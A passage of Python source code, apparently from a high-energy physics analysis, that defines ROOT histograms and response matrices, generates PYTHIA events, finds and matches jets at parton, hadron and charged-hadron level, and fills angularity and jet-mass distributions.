h.GetYaxis().SetTitle('#it{N}_{constit}^{h jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_p_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{parton jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
'''
for obs in self.observable_list:
if obs != "ang" and obs != "mass":
raise ValueError("Observable %s not yet implemented in this script!" % obs)
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
obs_bins = getattr(self, "obs_bins_"+obs)
if self.level in [None, 'ch']:
name = 'h_%s_JetPt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{ch jet}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'h_%s_JetPt_ch_MPIon_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{ch jet}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name_MPIon).append(h)
if self.level in [None, 'h']:
name = 'h_%s_JetPt_h_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{jet, h}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{h}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
if self.level in [None, 'p']:
name = 'h_%s_JetPt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{jet, parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
if self.level == None:
name = 'hResponse_%s_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(obs_bins)-1, obs_bins, len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
'''
name = 'hResponse_%s_PtBinCH20-40_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hResponse_%s_PtBinCH40-60_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hResponse_%s_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Phase space plots integrated over all pT bins
name = 'hPhaseSpace_DeltaR_Pt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_DeltaR_Pt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Phase space plots binned in ch jet pT
name = 'hPhaseSpace_DeltaR_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_DeltaR_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Annulus plots for amount of lambda contained within some r < R
self.annulus_plots_num_r = 150
self.annulus_plots_max_x = 1.5
low_bound = self.annulus_plots_max_x / self.annulus_plots_num_r / 2.
up_bound = self.annulus_plots_max_x + low_bound
name = 'hAnnulus_%s_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{ch jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{ch jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{ch jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{ch jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{parton jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{parton jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{parton jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{parton jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
'''
name = "h_%sResidual_JetPt_%sScaled" % (obs, label)
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -3., 1.)
h.GetXaxis().SetTitle('p_{T}^{jet, parton}')
h.GetYaxis().SetTitle(
'#frac{' + self.obs_names[obs] + '^{parton}-' + \
self.obs_names[obs] + '^{ch}}{' + self.obs_names[obs] + '^{parton}}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = "h_%sDiff_JetPt_%sScaled" % (obs, label)
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -2., 2.)
h.GetXaxis().SetTitle('#it{p}_{T}^{jet, ch}')
h.GetYaxis().SetTitle(self.obs_names[obs] + '^{parton}-' + \
self.obs_names[obs] + '^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Create THn of response
dim = 4
title = ['p_{T}^{ch jet}', 'p_{T}^{parton jet}',
self.obs_names[obs]+'^{ch}', self.obs_names[obs]+'^{parton}']
nbins = [len(self.pt_bins)-1, len(self.pt_bins)-1,
len(obs_bins)-1, len(obs_bins)-1]
min_li = [self.pt_bins[0], self.pt_bins[0],
obs_bins[0], obs_bins[0] ]
max_li = [self.pt_bins[-1], self.pt_bins[-1],
obs_bins[-1], obs_bins[-1] ]
name = 'hResponse_JetPt_%s_ch_%sScaled' % (obs, label)
nbins = (nbins)
xmin = (min_li)
xmax = (max_li)
nbins_array = array('i', nbins)
xmin_array = array('d', xmin)
xmax_array = array('d', xmax)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Another set of THn for full hadron folding
title = ['p_{T}^{h jet}', 'p_{T}^{parton jet}',
self.obs_names[obs] + '^{h}', self.obs_names[obs] + '^{parton}']
name = 'hResponse_JetPt_%s_h_%sScaled' % (obs, label)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Finally, a set of THn for folding H --> CH (with MPI on)
title = ['p_{T}^{ch jet}', 'p_{T}^{h jet}',
self.obs_names[obs] + '^{ch}', self.obs_names[obs] + '^{h}']
name = 'hResponse_JetPt_%s_Fnp_%sScaled' % (obs, label)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name_MPIon).append(h)
#---------------------------------------------------------------
# Initiate jet defs, selectors, and sd (if required)
#---------------------------------------------------------------
def init_jet_tools(self):
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
if not self.no_tree:
# Initialize tree writer
name = 'particle_unscaled_R%s' % jetR_str
t = ROOT.TTree(name, name)
setattr(self, "t_R%s" % jetR_str, t)
tw = RTreeWriter(tree=t)
setattr(self, "tw_R%s" % jetR_str, tw)
# set up our jet definition and a jet selector
jet_def = fj.JetDefinition(fj.antikt_algorithm, jetR)
setattr(self, "jet_def_R%s" % jetR_str, jet_def)
print(jet_def)
pwarning('max eta for particles after hadronization set to', self.max_eta_hadron)
parts_selector_h = fj.SelectorAbsEtaMax(self.max_eta_hadron)
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
jet_selector = fj.SelectorPtMin(5.0) & \
fj.SelectorAbsEtaMax(self.max_eta_hadron - jetR)
setattr(self, "jet_selector_R%s" % jetR_str, jet_selector)
#max_eta_parton = self.max_eta_hadron + 2. * jetR
#setattr(self, "max_eta_parton_R%s" % jetR_str, max_eta_parton)
#pwarning("Max eta for partons with jet R =", jetR, "set to", max_eta_parton)
#parts_selector_p = fj.SelectorAbsEtaMax(max_eta_parton)
#setattr(self, "parts_selector_p_R%s" % jetR_str, parts_selector_p)
count1 = 0 # Number of jets rejected from ch-h matching
setattr(self, "count1_R%s" % jetR_str, count1)
count2 = 0 # Number of jets rejected from h-p matching
setattr(self, "count2_R%s" % jetR_str, count2)
#---------------------------------------------------------------
# Calculate events and pass information on to jet finding
#---------------------------------------------------------------
def calculate_events(self, pythia, MPIon=False):
iev = 0 # Event loop count
if MPIon:
hNevents = self.hNeventsMPI
else:
hNevents = self.hNevents
while hNevents.GetBinContent(1) < self.nev:
if not pythia.next():
continue
parts_pythia_p = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], 0, True)
hstatus = pythia.forceHadronLevel()
if not hstatus:
#pwarning('forceHadronLevel false event', iev)
continue
#parts_pythia_h = pythiafjext.vectorize_select(
# pythia, [pythiafjext.kHadron, pythiafjext.kCharged])
parts_pythia_h = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], 0, True)
parts_pythia_hch = pythiafjext.vectorize_select(
pythia, [pythiafjext.kFinal, pythiafjext.kCharged], 0, True)
""" TODO: fix for multiple jet R
parts_pythia_p_selected = parts_selector_p(parts_pythia_p)
parts_pythia_h_selected = parts_selector_h(parts_pythia_h)
parts_pythia_hch_selected = parts_selector_h(parts_pythia_hch)
if self.debug_level > 1:
pinfo('debug partons...')
for p in parts_pythia_p_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
pinfo('debug hadrons...')
for p in parts_pythia_h_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
pinfo('debug ch. hadrons...')
for p in parts_pythia_hch_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
"""
# Some "accepted" events don't survive hadronization step -- keep track here
hNevents.Fill(0)
self.find_jets_fill_trees(parts_pythia_p, parts_pythia_h, parts_pythia_hch, iev, MPIon)
iev += 1
#---------------------------------------------------------------
# Find jets, do matching between levels, and fill histograms & trees
#---------------------------------------------------------------
def find_jets_fill_trees(self, parts_pythia_p, parts_pythia_h, parts_pythia_hch,
iev, MPIon=False):
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
jet_selector = getattr(self, "jet_selector_R%s" % jetR_str)
jet_def = getattr(self, "jet_def_R%s" % jetR_str)
t = None; tw = None;
if not self.no_tree:
t = getattr(self, "t_R%s" % jetR_str)
tw = getattr(self, "tw_R%s" % jetR_str)
count1 = getattr(self, "count1_R%s" % jetR_str)
count2 = getattr(self, "count2_R%s" % jetR_str)
# parts = pythiafjext.vectorize(pythia, True, -1, 1, False)
jets_p = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_p)))
jets_h = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_h)))
jets_ch = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_hch)))
if MPIon:
if self.level:
for jet in locals()["jets_" + self.level]:
self.fill_unmatched_histograms(jetR, jet, self.level, MPI=True)
continue # Don't need to do matching
else:
for jet in jets_p:
self.fill_unmatched_histograms(jetR, jet, 'p', MPI=True)
for jet in jets_h:
self.fill_unmatched_histograms(jetR, jet, 'h', MPI=True)
for jet in jets_ch:
self.fill_unmatched_histograms(jetR, jet, 'ch', MPI=True)
else: # MPI off
if self.level:
for jet in locals()["jets_" + self.level]:
self.fill_unmatched_histograms(jetR, jet, self.level)
if not self.no_tree:
self.fill_unmatched_jet_tree(tw, jetR, iev, jet)
continue # Don't need to do matching
else:
for jet in jets_p:
self.fill_unmatched_histograms(jetR, jet, 'p')
for jet in jets_h:
self.fill_unmatched_histograms(jetR, jet, 'h')
for jet in jets_ch:
self.fill_unmatched_histograms(jetR, jet, 'ch')
# Start the matching procedure
for i,jchh in enumerate(jets_ch):
# match hadron (full) jet
drhh_list = []
for j, jh in enumerate(jets_h):
drhh = jchh.delta_R(jh)
if drhh < jetR / 2.:
drhh_list.append((j,jh))
if len(drhh_list) != 1:
count1 += 1
else: # Require unique match
j, jh = drhh_list[0]
# match parton level jet
dr_list = []
for k, jp in enumerate(jets_p):
dr = jh.delta_R(jp)
if dr < jetR / 2.:
dr_list.append((k, jp))
if len(dr_list) != 1:
count2 += 1
else:
k, jp = dr_list[0]
if self.debug_level > 0:
pwarning('event', iev)
pinfo('matched jets: ch.h:', jchh.pt(), 'h:', jh.pt(),
'p:', jp.pt(), 'dr:', dr)
if not MPIon:
self.fill_jet_histograms(jetR, jp, jh, jchh)
if not self.no_tree:
self.fill_matched_jet_tree(tw, jetR, iev, jp, jh, jchh)
else:
self.fill_jet_histograms_MPI(jetR, jp, jh, jchh)
#print(" |-> SD jet params z={0:10.3f} dR={1:10.3f} mu={2:10.3f}".format(
# sd_info.z, sd_info.dR, sd_info.mu))
if MPIon:
setattr(self, "count1_R%s_MPIon" % jetR_str, count1)
setattr(self, "count2_R%s_MPIon" % jetR_str, count2)
else:
setattr(self, "count1_R%s" % jetR_str, count1)
setattr(self, "count2_R%s" % jetR_str, count2)
#---------------------------------------------------------------
# Fill jet tree with (unscaled/raw) matched parton/hadron tracks
#---------------------------------------------------------------
def fill_matched_jet_tree(self, tw, jetR, iev, jp, jh, jch):
tw.fill_branch('iev', iev)
tw.fill_branch('ch', jch)
tw.fill_branch('h', jh)
tw.fill_branch('p', jp)
self.fill_unmatched_jet_tree(tw, jetR, iev, jp, level='p', save_iev=False)
self.fill_unmatched_jet_tree(tw, jetR, iev, jh, level='h', save_iev=False)
self.fill_unmatched_jet_tree(tw, jetR, iev, jch, level='ch', save_iev=False)
#---------------------------------------------------------------
# Fill jet tree with (unscaled/raw) unmatched parton/hadron tracks
#---------------------------------------------------------------
def fill_unmatched_jet_tree(self, tw, jetR, iev, jet, level='ch', save_iev=True):
if save_iev:
tw.fill_branch('iev', iev)
tw.fill_branch(level, jet)
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
jet_sd = None
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
obs_val = None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_val = fjext.lambda_beta_kappa(jet, jet_sd, alpha, kappa, jetR)
else:
obs_val = fjext.lambda_beta_kappa(jet, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_val = jet_sd.m() if jet_sd.has_constituents() else -1
else:
obs_val = jet.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_jet_tree")
tw.fill_branch("%s_%s_%s" % (obs, level, label), obs_val)
#---------------------------------------------------------------
# Fill jet histograms for PYTHIA run-through before matching
#---------------------------------------------------------------
def fill_unmatched_histograms(self, jetR, jet, level, MPI=False):
# Observable-independent histograms
R_label = str(jetR).replace('.', '') + 'Scaled'
if MPI:
getattr(self, 'hJetPt_%s_MPIon_R%s' % (level, R_label)).Fill(jet.pt())
getattr(self, 'hNconstit_Pt_%s_MPIon_R%s' % (level, R_label)).Fill(jet.pt(), len(jet.constituents()))
else:
getattr(self, 'hJetPt_%s_R%s' % (level, R_label)).Fill(jet.pt())
getattr(self, 'hNconstit_Pt_%s_R%s' % (level, R_label)).Fill(jet.pt(), len(jet.constituents()))
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
if MPI:
h = getattr(self, 'h_%s_JetPt_%s_MPIon_%sScaled' % (obs, level, label))
else:
h = getattr(self, 'h_%s_JetPt_%s_%sScaled' % (obs, level, label))
# Jet angularity histograms
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
h.Fill(jet.pt(), fjext.lambda_beta_kappa(jet, jet_sd, alpha, kappa, jetR))
else:
h.Fill(jet.pt(), fjext.lambda_beta_kappa(jet, alpha, kappa, jetR))
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
if not jet_sd.has_constituents():
# Untagged jet -- record underflow value
h.Fill(jet.pt(), -1)
else:
h.Fill(jet.pt(), jet_sd.m())
else:
h.Fill(jet.pt(), jet.m())
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
#---------------------------------------------------------------
# Fill matched jet histograms
#---------------------------------------------------------------
def fill_jet_histograms(self, jetR, jp, jh, jch):
R_label = str(jetR).replace('.', '') + 'Scaled'
if self.level == None:
if jp.pt(): # prevent divide by 0
getattr(self, 'hJetPtRes_R%s' % R_label).Fill(jp.pt(), (jp.pt() - jch.pt()) / jp.pt())
getattr(self, 'hResponse_JetPt_R%s' % R_label).Fill(jp.pt(), jch.pt())
'''
if 60 <= jch.pt() < 80:
getattr(self, 'hNconstit_Pt_ch_PtBinCH60-80_R%s' % R_label).Fill(
jch.pt(), len(jch.constituents()))
getattr(self, 'hNconstit_Pt_h_PtBinCH60-80_R%s' % R_label).Fill(
jh.pt(), len(jh.constituents()))
getattr(self, 'hNconstit_Pt_p_PtBinCH60-80_R%s' % R_label).Fill(
jp.pt(), len(jp.constituents()))
'''
# Fill observable histograms and response matrices
for alpha in self.alpha_list:
self.fill_RMs(jetR, alpha, jp, jh, jch)
#---------------------------------------------------------------
# Fill jet response matrices
#---------------------------------------------------------------
def fill_RMs(self, jetR, alpha, jp, jh, jch):
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
jp_sd, jh_sd, jch_sd = None, None, None
if grooming_setting:
gshop_p = fjcontrib.GroomerShop(jp, jetR, self.reclustering_algorithm)
jp_sd = self.utils.groom(gshop_p, grooming_setting, jetR).pair()
gshop_h = fjcontrib.GroomerShop(jh, jetR, self.reclustering_algorithm)
jh_sd = self.utils.groom(gshop_h, grooming_setting, jetR).pair()
gshop_ch = fjcontrib.GroomerShop(jch, jetR, self.reclustering_algorithm)
jch_sd = self.utils.groom(gshop_ch, grooming_setting, jetR).pair()
obs_p, obs_h, obs_ch = None, None, None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_p = fjext.lambda_beta_kappa(jp, jp_sd, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, jh_sd, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, jch_sd, alpha, kappa, jetR)
else:
obs_p = fjext.lambda_beta_kappa(jp, alpha, kappa, jetR)
obs_h = fjext.lambda_beta_kappa(jh, alpha, kappa, jetR)
obs_ch = fjext.lambda_beta_kappa(jch, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_p = jp_sd.m() if jp_sd.has_constituents() else -1
obs_h = jh_sd.m() if jh_sd.has_constituents() else -1
obs_ch = jch_sd.m() if jch_sd.has_constituents() else -1
else:
obs_p = jp.m()
obs_h = jh.m()
obs_ch = jch.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
for level in ['p', 'h', 'ch']:
if self.level in [None, level]:
getattr(self, 'h_%s_JetPt_%s_%sScaled' % (obs, level, label)).Fill(jch.pt(), locals()['obs_'+level])
if self.level == None:
getattr(self, 'hResponse_%s_%sScaled' % (obs, label)).Fill(obs_p, obs_ch)
'''
# Lambda at p-vs-ch-level for various bins in ch jet pT
if 20 <= jch.pt() < 40:
getattr(self, 'hResponse_%s_PtBinCH20-40_%sScaled' % (obs, label)).Fill(lp, lch)
elif 40 <= jch.pt() < 60:
getattr(self, 'hResponse_%s_PtBinCH40-60_%sScaled' % (obs, label)).Fill(lp, lch)
elif 60 <= jch.pt() < 80:
getattr(self, 'hResponse_%s_PtBinCH60-80_%sScaled' % (obs, label)).Fill(lp, lch)
# Phase space plots and annulus histograms, including those binned in ch jet pT
num_r = self.annulus_plots_num_r
ang_per_r_ch = [0] * num_r
for particle in jch.constituents():
deltaR = particle.delta_R(jch)
getattr(self, 'hPhaseSpace_DeltaR_Pt_ch_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
lambda_i = lambda_beta_kappa_i(particle, jch, jetR, alpha, 1)
getattr(self, 'hPhaseSpace_%s_DeltaR_ch_%sScaled' % (obs, label)).Fill(deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_ch_%sScaled' % (obs, label)).Fill(particle.pt(), lambda_i)
if 60 <= jch.pt() < 80:
getattr(self, 'hPhaseSpace_DeltaR_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
getattr(self, 'hPhaseSpace_%s_DeltaR_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
deltaR / jetR, lambda_i)
getattr(self, 'hPhaseSpace_%s_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)).Fill(
particle.pt(), lambda_i)
ang_per_r_ch = [ang_per_r_ch[i] + lambda_i *
(deltaR <= ((i+1) * jetR * self.annulus_plots_max_x / num_r))
for i in range(0, num_r, 1)]
ang_per_r_p = [0] * num_r
for particle in jp.constituents():
deltaR = particle.delta_R(jp)
getattr(self, 'hPhaseSpace_DeltaR_Pt_p_%sScaled' % (obs, label)).Fill(
particle.pt(), deltaR / jetR)
